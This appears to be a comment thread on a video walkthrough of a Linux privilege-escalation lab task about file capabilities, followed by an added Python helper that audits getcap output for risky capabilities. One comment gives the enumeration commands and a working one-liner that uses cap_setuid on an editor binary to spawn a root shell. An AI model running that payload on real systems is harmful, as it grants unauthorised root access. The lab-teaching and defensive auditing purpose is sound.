Linux PrivEsc Task 8 Privilege Escalation: Capabilities

commands in comments
Comments

Hi Danny, thanks for the wonderful video.

It works.
One question though, when I type 'cat view', why does it spew out binaries, and at the end, the terminal was blinking red and blue, and the text in the terminal was struck through?
I remember another binary file that I opened; it just spewed out binaries, without the red and blue flashing terminal.

clarkg

Linux PrivEsc Task 8 Privilege Escalation: Capabilities
pwd

whoami


getcap -r / 2>/dev/null

check gtfobins site

exploit view paste code below



/home/ubuntu/view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'


When an executable file's setuid permission is set, users may execute that program with a level of access that matches the user who owns the file.


SETUID means that the executable can run under different permissions than the user who has executed it.

SETUID 0 or root means that when the program is run it is as if root ran it - which leaves you open to all the usual security risks of running something at high permission levels - it could potentially do anything to your system - so generally the number of applications that require SETUID should be minimised on a Unix box. Most security audits of Unix machines include looking for SETUID and SETGID files that are world writeable as they present a high risk.


see 6
= cap_net_bind_service, cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep

intothecodewithdanny
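
An added example, not part of the video or the comments above: a small audit helper that parses `getcap -r /` output and reports binaries holding a high-risk capability in both the effective and permitted sets, which is what makes the `view` and `vim` entries stand out from `ping`. The `HIGH_RISK` list and the function names are assumptions chosen for illustration; the sample lines are the entries from the comment above, one per line.

```python
import re

# Capabilities that let a general-purpose binary (editor, interpreter) reach root.
# Assumption: illustrative shortlist, not an exhaustive policy.
HIGH_RISK = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
}

# Accepts "path = caps+ep" (as in the comment) and "path caps=ep" (newer libcap).
LINE = re.compile(r"^(?P<path>/\S+)\s+(?:=\s+)?(?P<caps>\S.*)$")
# One clause: comma-separated names, an operator, then flags e/i/p.
CLAUSE = re.compile(r"(?P<names>[a-z_0-9,]*)(?P<op>[+=])(?P<flags>[eip]+)")

# getcap entries taken from the comment above, split one per line.
SAMPLE = """\
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
"""

def parse_getcap(output):
    """Yield (path, {capability: flags}) for each parsable getcap line."""
    for line in output.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # skip blanks and lines without an absolute path
        caps = {}
        for c in CLAUSE.finditer(m.group("caps")):
            for name in filter(None, c.group("names").split(",")):
                caps[name] = c.group("flags")
        yield m.group("path"), caps

def risky(output):
    """Return [(path, [caps])] where a high-risk capability is effective and permitted."""
    findings = []
    for path, caps in parse_getcap(output):
        hits = sorted(n for n, f in caps.items()
                      if n in HIGH_RISK and "e" in f and "p" in f)
        if hits:
            findings.append((path, hits))
    return findings

if __name__ == "__main__":
    for path, hits in risky(SAMPLE):
        print(f"REVIEW {path}: {','.join(hits)}")
```

On a real host, feed it the output of `getcap -r / 2>/dev/null`; a capability that is not needed can be cleared with `setcap -r <path>`.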